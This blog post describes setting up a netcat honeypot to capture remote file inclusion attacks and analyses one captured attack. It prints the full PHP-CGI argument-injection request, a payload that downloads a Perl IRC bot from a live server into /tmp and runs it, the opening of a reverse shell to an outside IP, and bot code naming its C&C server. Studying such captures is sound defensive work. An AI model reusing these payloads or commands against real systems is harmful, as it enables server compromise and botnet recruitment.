Tuesday, October 14, 2014

Welcome to my HoneyPot RFI Guy

Untitled Document

Welcome to my HoneyPot RFI Guy

There are tons of RFI attacks out there, to study them you only need to set up a honeypot listening on port 80 with a public IP.

I recommend you to install inetsim or glastopf, but netcat could be enough to catch some attacks.You only need to launch it, redirect the output to a file and wait:

nc -k -v -l 80 > /var/log/honey.log 2>&1

You can use several tools like logsurfer or sec to look for patterns in the log file and alert you, or simply use grep after some days to look for RFI attacks:

grep -A10 POST /var/log/honey.log

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 92.222.38.66
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
Content-Length: 2171
Connection: close

<?php system("wget 208.85.177.238/.x/hb/php02 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7 85.214.73.166;rm -rf /tmp/.bash_h1s7 &"); ?>set_time_limit(0);
$ip = '91.121.105.21';
$port = 22;
$chunk_size = 1400;
.....

As you can see in the php system call, the attacker downloads a file from server 208.85.177.238 and executes it. The next php code is a reverse shell that connects to 91.121.105.21 on port 22.

Let's look at the script:

wget 208.85.177.238/.x/hb/php02
more php02

$p = "";
for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
}
my @ps = (" ");
my $processo = $ps[rand scalar @ps];
$servidor='194.24.228.203' unless $servidor;
my $porta='443';
my @canais=("#allornothing");
.....

That's the typical perl IRC bot, you can use a tool like ircsnapshot from @botnet_hunter to gather information from the botnet. At this moment the access to the C&C server is filtered, It could be possible that they only permit IPs that has succesfully executed the reverse shell.

Script file names

Why are someone using 02 in a file name? I think that it could be possible that exists a 01 file, so let's check it:

wget 208.85.177.238/.x/hb/php01
Connecting to 208.85.177.238:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25709 (25K) [text/plain]
Saving to: `php01.1'

100%[=============================================================================>] 25.709      50,4K/s   in 0,5s

(50,4 KB/s) - `php01' saved [25709/25709]

Bingo !!!, how many files are there?

ls -al
total 288
drwxrwxr-x 2 itsuugo itsuugo  4096 oct 14 22:58 .
drwxrwxr-x 3 itsuugo itsuugo  4096 oct 14 21:58 ..
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php01
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php02
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php03
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php04
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php05
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php06
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php07
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php08
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php09
-rw-rw-r-- 1 itsuugo itsuugo 25709 jul 22 08:04 php10

$wget 208.85.177.238/.x/hb/php11
Connecting to 208.85.177.238:80... connected.
HTTP request sent, awaiting response... 404 Not Found
ERROR 404: Not Found.

There are 10 files and they only differ in the nick assigned,

diff -c php01 php10
*** php01       
--- php10       
***************
*** 43,49 ****
  #####################

  sub getnick {
!   return "Rizee|ZYN|01|".int(rand(8999)+1000);
  }


--- 43,49 ----
  #####################

  sub getnick {
!   return "Rizee|ZYN|10|".int(rand(8999)+1000);
  }

Could the attacker be preparing different campaigns?

Hope good people like MalwareMustDie could catch them.